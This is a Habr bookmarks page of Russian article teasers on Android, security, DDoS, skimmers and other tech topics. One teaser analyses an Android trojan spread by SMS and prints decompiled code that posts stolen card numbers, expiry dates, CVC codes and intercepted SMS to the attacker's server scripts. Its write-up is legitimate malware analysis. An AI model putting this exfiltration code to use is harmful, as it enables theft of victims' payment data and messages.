Articles / Bookmarks / Profile of Angel_D13 / Habr

How to become an author

Евгений @Angel_D13

Пользователь

Profile Publications Comments 4Bookmarks 98

omilen Nov 19 2014 at 18:09

Защита личных фотоснимков на телефонах Android

3 min

52K

КиберСофт corporate blogInformation Security*Development for Android*

Как сделать личные фотографии на своем телефоне недоступными для посторонних? Как настроить телефон таким образом, чтобы при фотографировании конфиденциальные снимки автоматически записывались в криптоконтейнер? И как сохранить за собой возможность быстрого и удобного доступа к ним?

Читать дальше →

+4

ptsecurity Nov 19 2014 at 20:57

Безопасность 4G: захватываем USB-модем и SIM-карту с помощью SMS

4 min

152K

Positive Technologies corporate blogInformation Security*Development of communication systems*

Телеком-операторы активно рекламируют быструю и дешевую 4G-связь. Но насколько она защищена, знают немногие. Экспертам Positive Technologies в процессе исследования безопасности 4G-коммуникаций удалось найти уязвимости в USB-модемах, позволяющие взять под контроль компьютер, к которому подключён модем, а также аккаунт абонента на портале мобильного оператора. Кроме того, атаки на SIM-карту с помощью бинарных SMS позволяют перехватить и расшифровать трафик абонента, либо просто заблокировать заданную «симку».

Читать дальше →

+80

Effect Nov 17 2014 at 14:11

Должны ли все изучать программирование?

7 min

49K

Stepik.org corporate blogPython*

Translation

Предлагаю вашему вниманию перевод статьи «Should Everybody Learn to Code?», которая показалась мне интересной.

Чтобы проверить, смогут ли профессиональные графические дизайнеры написать простейшую компьютерную программу, Брайан Дорн, в то время студент магистратуры в Технологическом институте Джорджии (Georgia Tech), попросил их прочесть и изменить фрагмент программного кода. Дорн хотел понять, смогут ли они сами разобраться – как автоматизировать работу в Adobe Photoshop. Дизайнеры стали искать информацию в Интернете и, к сожалению, во многих случаях вводили неверные поисковые запросы: например, пытались разобраться с Java, когда на самом деле им был нужен JavaScript для этого конкретного проекта.

Это могло быть связано с «отсутствием общего базового понимания компьютерных и программных структур», писал Дорн в журнале Communications в мае 2011 года.

Читать дальше →

+26

Oksumoron Nov 17 2014 at 15:21

Подключаем FB, VK, G+ в Android. Версия Light

9 min

29K

Java*Development of mobile applications*Development for Android*

Встала передо мной задача – сделать постинг ссылок из Андроида в пару-тройку соцсетей. Причем, максимально простой и легкий – чтобы не плодить сущности и как можно меньше заморачиваться с токенами, сессиями и прочая. Задача, действительно, минимум – только размещение ссылки в собственном аккаунте пользователя. Если к ссылке можно легко добавить описания или картинки – сделать, но не упираться.

В силу разных причин были выбраны Facebook, Vkontakte и Google+. Планировала добавить Twitter, но его Fabric к тому времени еще не вышел, а использовать стороннюю библиотеку не хотелось (см. п.2 ниже). Позже добавлю.

В итоге, задача для этих трех соцсетей получилась следующей:

Максимально простой программный интерфейс постинга ссылок.
Использование только нативных SDK (из тех соображений, что эти знания пригодятся в дальнейшем).
Минимум кода – только самое необходимое для работы.
Работать все должно вне зависимости от наличия у пользователя установленного клиента соцсети. Но если он есть – использовать диалоговые окна клиента.
Пользователю должно выводиться сообщение об успешном или нет размещении записи.
Должна быть возможность программно реагировать на успешное размещение записи.

Читать дальше →

+21

DrTariff Nov 10 2014 at 17:45

История о том, как мобильный оператор списал деньги с разработчика Dr. Tariff (захватите попкорн)

3 min

50K

Dr. Tariff corporate blog

На прошлой неделе мы решили рассказать читателям Хабра о том, как устроен профиль потребления абонента сотовой связью в России по агрегированным данным из Dr. Tariff (Google Play, App Store). Считали различные метрики, спорили о том, есть ли сезонность на рынке связи и как правильней считать эластичность спроса по цене. Вдруг завибрировал телефон…

Читать дальше →

+50

Pyjamec Aug 8 2011 at 16:53

Правильная работа с БД в Android

7 min

154K

Development for Android*

Приветствую всех дроидеров в эти непростые для нас времена.
Честно говоря, заколебала эта шумиха о патентах, войнах и т.д., но в данной статье речь пойдет не об этом.
Я не собирался писать статью на данную тему, так как везде всего полно о работе с базой данных в Android и вроде бы все просто, но уж очень надоело получать репорты об ошибках, ошибках специфичных и связанных с БД.
Поэтому, я рассматрю пару моментов с которыми я столкнулся на практике, чтобы предостеречь людей, которым только предстоит с этим разбираться, а дальше жду ваших комментариев на тему решения указанных проблем после чего внесу изменения в пост и мы сделаем отличный туториал, который будет образцом работы с SQLite в Android не только для начинающих, но и для тех, кто уже знаком с основами и написал простые приложения.

Читать дальше →

+39

LinuxCoder Oct 15 2014 at 10:35

Живительная флешка

10 min

520K

System administration*Antivirus protection**nix*

На данный момент в сети имеется целая куча различных инструкций по созданию дежурной рабочей сисадминской флешки, но, к сожалению, многие из них уже устарели и просто не подходят под современные задачи.

Я не собираюсь описывать процесс установки GRUB4DOS, так как это не изменилось и в сети полно инструкций. Просто скажу, что GRUB4DOS просто должен быть установлен на флешку. Также я НЕ собираюсь выкладывать здесь образы систем (все имеется на торрентах), но, тем не менее, выложу полное меню из LST-файлов со структурой папок. Также необходимо учесть, что все образы ISO необходимо дефрагментировать.

Читать дальше →

+63

staskin1 Oct 1 2014 at 02:23

Нужна ли в России поддержка национальных разработчиков ПО? Once upon a time in Russia

5 min

24K

Свой или чужой?

Вот уже 15-й год моя компания разрабатывает ПО. Сидим в Питере, специализируемся на системах управления корпоративным контентом (ECM), флагманский продукт — STOR-M, на базе которого строятся электронные архивы, электронные библиотеки и корпоративные базы нормативно-технических документов. Мы, как и многие российские компании, основным рынком сбыта которых является Россия, шкурно заинтересованы в поддержке своих продуктов на государственном уровне. Сегодня много говорят и пишут об импортозамещении, поддержке российских разработчиков, возможно за их же счет (десятина с продаж ПО). Хочу поделиться своим видением ситуации, обсудить возникшие вопросы.

Читать дальше →

+31

bks Sep 22 2014 at 13:15

Управленческие отчеты для руководства и собственника бизнеса на основе данных существующих бухгалтерских баз

10 min

23K

Управленческая триада из ТМА облачного сервиса tma-service.ru

Потратив несколько лет на исследования в области автоматизации процессов счетоводства, мы разработали уникальные технологии, методологию и ряд программных продуктов. Но, чтобы создать прикладные решения в реалиях повседневной практики, нам пришлось потратить последние два года на общение со специалистами учета и потребителями результатов учета непосредственно.

Читать дальше →

+2

RussianOnion Sep 22 2014 at 14:55

Немного о Tor и русскоязычном .onion-пространстве

5 min

297K

Information Security*

Вместо вступления

Статьи о Tor — не такая уж редкость. Действительно, последние несколько лет эта замечательнейшая сеть набирает всё большую популярность. Жаль, что происходит это не столь стремительно и совсем не так, как нам, её обитателям, хотелось бы. На первый взгляд, причины этих событий лежат на поверхности. Но если с ростом популярности всё относительно понятно, то на его скорости и структуре стоит остановится несколько подробнее. Попробуем разобраться, как и почему мы пришли к текущему состоянию этой сети, что делать и даже кто (или, скорее что) виноват(о).

Читать дальше →

+40

Ilya_Andreev Sep 9 2014 at 13:08

Java для школьников: обучение через создание игр

4 min

66K

1С: Клуб программистов corporate blogJava*Game development*

Большинство современных детей играет в компьютерные игры. А хотелось ли вам самим когда-нибудь написать игру? Возможно, не только хотелось, но вы их и писали. Такое же желание посещает многих школьников. Правда, в отличие от вас, они не знают с чего начать, даже какой язык выбрать. Это и есть отправная точка, которая может стать хорошим стимулом для изучения программирования.
Одно дело играть, а другое дело разрабатывать. Пусть это небольшая двумерная компьютерная игра, но она «греет душу» намного сильнее, чем любая крутая купленная. И все потому, что эта игра ваша! Вы – ее создатель, разработчик, вы — творец! Вот появляется фон, вот — лабиринт, а потом и танк на игровом поле. Еще добавим программного кода, и танк начинает ездить по лабиринту. Так, шаг за шагом рождается игра, которая создается по сценарию ее творца. При этом каждая задумка требует усилий — подумать, написать, отладить. Не все получается сразу… А вот навыки программирования оттачиваются очень хорошо. Стоит написать несколько игрушек и вот уже обеспечен начальный уровень в программировании, заложен фундамент для будущей профессиональной деятельности.

Читать дальше →

+12

Scorpion97 Sep 9 2014 at 16:03

30 полезных сервисов для веб-разработчиков и дизайнеров v2

3 min

86K

Website development*CSS*

Предыстория: я веду свой паблик ВК о веб-разработке, в связи с чем я каждый день имею дело с большим количеством материалов о веб-разработке. Однажды (3 месяца назад) мне пришла в голову идея опубликовать на хабре подборку «30 полезных сервисов для веб-разработчика». Тот пост набрал почти 100 000 просмотров, и мне приятно, что он оказался полезен сообществу. С тех пор у меня поднакопилось больше 30 новых сервисов, которые будут полезны как разработчикам, так и дизайнерам. Лучшие из них я собрал в этом посте. Осторожно, под катом много картинок!

Читать дальше →

+59

Vasiliskov Sep 4 2014 at 15:30

Можно ли «сломать» интернет?

7 min

81K

ua-hosting.company corporate blog

Технологический прогресс за последний век привёл к интересному парадоксу: люди не могут представить своей жизни без того, существование чего не могли себе даже вообразить 30-40 лет назад. В сфере информации когда-то это было радио, следом за ним пришло телевидение, а там и интернет подоспел. Да настолько плотно подоспел, что маленьких детей перестали ставить в угол, им просто отключают интернет. А моя 60-летняя мама регулярно смотрит на планшете прогнозы погоды, новости и видеоролики по уходу за собаками на YouTube.

Мы все воспринимаем интернет как данность, и когда он ненадолго пропадает, мы возмущаемся, как водитель, которого на скорости подрезала дщерь беловласая на розовом джипе. А может ли что-то привести к глобальному нарушению работы всей этой паутины, при виде которой любой паук наверняка тронулся бы умом?

По некоторым данным именно так выглядит карта современного интернета. Изначально сеть задумывалась децентрализованной и гибко маршрутизируемой. В случае разрыва одного соединения данные пойдут в обход, по другим. Глядя на карту, сложно представить, по каким точкам нанести удар, чтобы всё перестало работать. Но давайте всё же немного пофантазируем о том, какие действия, процессы и события, искусственные и природного характера, могли бы серьёзно нарушить работу этого сложного организма (не забывая о том, что не всё из этого такие уж фантазии).

Читать дальше →

+60

Django_unchained Sep 3 2014 at 23:21

В России закрываются салоны Samsung: второй эшелон наступает?

4 min

54K

SmartGadget corporate blog

На прошлой неделе была опубликована информация о банкротстве (точнее, заявке на таковое) ритейлера «Белый ветер цифровой», который в топе российских продавцов бытовой электроники занимает 16-е место. Среди более полусотни требования погашения задолженности особенно выделялась Apple с желанием вернуть больше всех – 456,9 миллиона рублей (~$12,3 миллиона долларов). Сегодня появился любопытный инфоповод, напрямую связанный с приведенным банкротством. Начала мельчать монобрендовая розничная сеть Samsung, прекращена работа 35 магазинов. Почему? Ответ прост – управлением этих салонов как раз занимался «Белый ветер». Как уточняет «Коммерсантъ», всего с начала года Samsung приостановила работу около 20% фирменных салонов по всей России.

Читать дальше →

+30

Vasiliskov Aug 29 2014 at 12:35

DDoS великий и ужасный

10 min

68K

ua-hosting.company corporate blog

Знаете ли Вы, что по данным исследований, проведённых Arbor Networks, Verisign Inc. и некоторыми другими компаниями:

ежедневно наблюдается порядка 2000 DDoS атак;
атака, способная «положить» небольшую компанию на неделю, стоит всего $150;
около 2/3 участников исследований (63%) страдали хотя бы раз от DDoS в течение года;
помимо прямых убытков и потери лояльности пользователей, атаки также влияют на продуктивность работы персонала;
11% респондентов были под атакой шесть и более раз за год;
среди тех, кто за последние 12 месяцев был под атакой, 46% лежали более 5 часов, а 23% — более 12 часов;
примерно треть всех случаев даунтайма у респондентов вызваны DDoS атаками.

Каким бывает DDoS, можно ли с ним бороться и как можно предостеречься? Об этом я вкратце поведаю в данной статье.

Читать дальше →

+22

Markeralex Aug 29 2014 at 16:04

Эволюция банкоматных скиммеров

5 min

315K

Computer hardwarePeriphery

Мы все привыкли к словосочетанию «технический прогресс». Уже довольно много лет назад смена поколений всевозможных устройств и гаджетов стала таким же привычным явлением, как смена времён года. И никого не удивляет, по большей части. Мы привыкли, к метаморфозам мобильных телефонов, домашних телевизоров, компьютерных мониторов, теперь вот подтянулись часы и даже очки. Однако есть некий немногочисленный класс устройств, о которых многие слышали, их опасаются, но в живую видели единицы. Речь идёт о скиммерах.

В России банкоматы до сих пор не столь распространены, несмотря на 23 года официального капитализма. Но даже у нас скиммеры стали некой городской страшилкой. И мало кто задумывается, что эти устройства, использующие высокотехнологичные компоненты, тоже со временем эволюционируют. И потому особый интерес представляет недавно опубликованный материал, в котором наглядно представлены этапы «модернизации» скиммеров, вплоть до современных новейших разработок криминальных умельцев.

Читать дальше →

+173

svolodimer Aug 28 2014 at 16:06

Как устроена Википедия (часть 3)

10 min

27K

Викимедиа РУ corporate blog

Привет, Хабр!

С учетом интереса к предыдущим публикациям об устройстве Википедии продолжим рассказ. Ненадолго перехвачу палочку у коллеги. Тему данной публикации можно сформулировать «Кто такие «Модераторы Википедии»» — она посвящен тому, кто и какими правами обладает при редактировании в Википедии.

Предыдущие статьи:

Читать дальше →

+38

xzilgiz Aug 27 2014 at 13:29

Решения разработки баз данных

5 min

19K

SQL*Microsoft SQL Server*

Добрый день! В процессе развития проекта приходится сталкиваться с проблемой производительности баз данных, т.к. объём данных растёт, и волей неволей выплывают проблемные участки.

В данном посте описаны не очень удачные решения, которые незаметны на ранних стадиях проекта. И решения, которые могут в дальнейшем в разы повысить производительность.

Пост больше рассчитан на более опытных разработчиков, которые уже возможно ищут решения, поэтому буду краток.

Читать дальше →

+2

vsarakoff Aug 27 2014 at 02:04

Cisco Systems выпустило экзамены по мобильным сетям

1 min

5.1K

В треке Service Provider у Cisco появилась новое направление — Service Provider Mobility. Предлагаются два направления — CDMA to LTE и UMTS to LTE. Для сдачи эказмена нет никаких требований, кроме как знаний самих технологий. В разделе литературы для данных экзаменов можно найти лишь PDF документ с описание курса для данной направленности. В разделе ресурсов Cisco даёт ссылки на сайт 3GPP, мануалы по настройке ASR5x00 и несколько книг разных авторов на тему мобильных сетей. Т.е. на данный момент отсутствуют специализированные книги от Cisco для подготовки к эказмену, как например для трека CCNA/CCNP/CCIE, и неизвестно, будут ли такие вообще.

+6

ValdikSS Aug 27 2014 at 00:58

Как я позорно деактивировал ботнет

10 min

191K

Information Security*

Разместил я, ничего не подозревая, объявление на avito.ru. Сколько раз туда ходил! Но на этот раз как-то не удалось…
Я давно был уверен, что многие нехорошие люди парсят телефонные номера с этого сайта, так что такси, строительные материалы, скорая компьютерная помощь, «8-800-555-3-555 — проще позвонить, чем у кого-то занимать» и приглашения на битву экстрасенсов для меня уже привычное дело, но на этот раз было нечто новое.

Приходит мне СМС-сообщение с текстом: «Зaинтерсoвaлo вaше oбьявление кaк нaсчет oбменa нa http://…». Прямо вот так, с пропущенным знаком препинания и ошибками. А по ссылке качается avito.apk. Интересно.

Исследование APK

Ну, подумал я, надо бы глянуть, что этот APK делает. Результат привычной для меня связки из apktool + dex2jar + jd-gui меня не удовлетворил, т.к. не было видно часть классов деревом, хотя доступ по ссылкам к ним получить было можно. Решил я воспользоваться новомодными онлайн-sandbox'ами — и декомпилированный код получил, и информацию, и pcap-файл со сдампленным трафиком. Как оказалось, этот файл загружали до меня, поэтому в мои руки попал более ранний анализ, что было достаточно полезно.

Итак, что умеет этот троян:

delivery&&& — рассылка СМС-сообщений на номера из телефонной книги с заданным текстом
sent&&& — отправка заданных СМС-сообщений с сервера
rent&&& — перехват всех СМС-сообщений и отправка их на сервер
sms_stop&&& — отмена перехвата СМС-сообщений
ussd&&& — USSD-запрос
call_1&&& — установка и отмена безусловной переадресации

Немного кода из моих заметок

protected HttpRequestBase a()
    {
        try
        {
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("bot_id", com.avito.a.c.a(c())));
            arraylist.add(new BasicNameValuePair("number", b));
            arraylist.add(new BasicNameValuePair("month", Integer.toString(c.intValue())));
            arraylist.add(new BasicNameValuePair("year", Integer.toString(d.intValue())));
            arraylist.add(new BasicNameValuePair("cvc", Integer.toString(e.intValue())));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("set_card.php").toString());
    }






    protected HttpRequestBase a()
    {
        try
        {
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("id", com.avito.a.c.a(b)));
            arraylist.add(new BasicNameValuePair("info", com.avito.a.c.b(b)));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("get.php").toString());
    }




    protected HttpRequestBase a()
    {
        try
        {
            JSONObject jsonobject = new JSONObject();
            jsonobject.put("text", c);
            jsonobject.put("number", d);
            jsonobject.put("date", e);
            HttpPost httppost = new HttpPost(d());
            ArrayList arraylist = new ArrayList();
            arraylist.add(new BasicNameValuePair("bot_id", com.avito.a.c.a(b)));
            arraylist.add(new BasicNameValuePair("sms", jsonobject.toString()));
            httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
            return httppost;
        }
        catch(UnsupportedEncodingException unsupportedencodingexception)
        {
            unsupportedencodingexception.printStackTrace();
        }
        catch(JSONException jsonexception)
        {
            jsonexception.printStackTrace();
        }
        return null;
    }

    protected String d()
    {
        return new String((new StringBuilder()).append(a).append("load_sms.php").toString());

Помимо этих команд, троян отключает Wifi Sleep, пытается получить доступ к зашифрованному хранилищу и установить себя в качестве Android-администратора (естественно, при этом используются стандартные диалоги ОС, где можно отменить данное действие). Код трояна не обфусцирован, некоторые строки закодированы base64. Вообще непонятно, что это за троян такой. То ли его собирали копипастой, то ли он основан на каком-то другом трояне, то ли еще что, но в нем имеются строки на португальском, немецком, английском, Ubuntu-шрифты, форма для перехвата данных из приложения немецкого банка Commerzbank, значок какой-то игры и флеш-плеера.

Читать дальше →

+356

4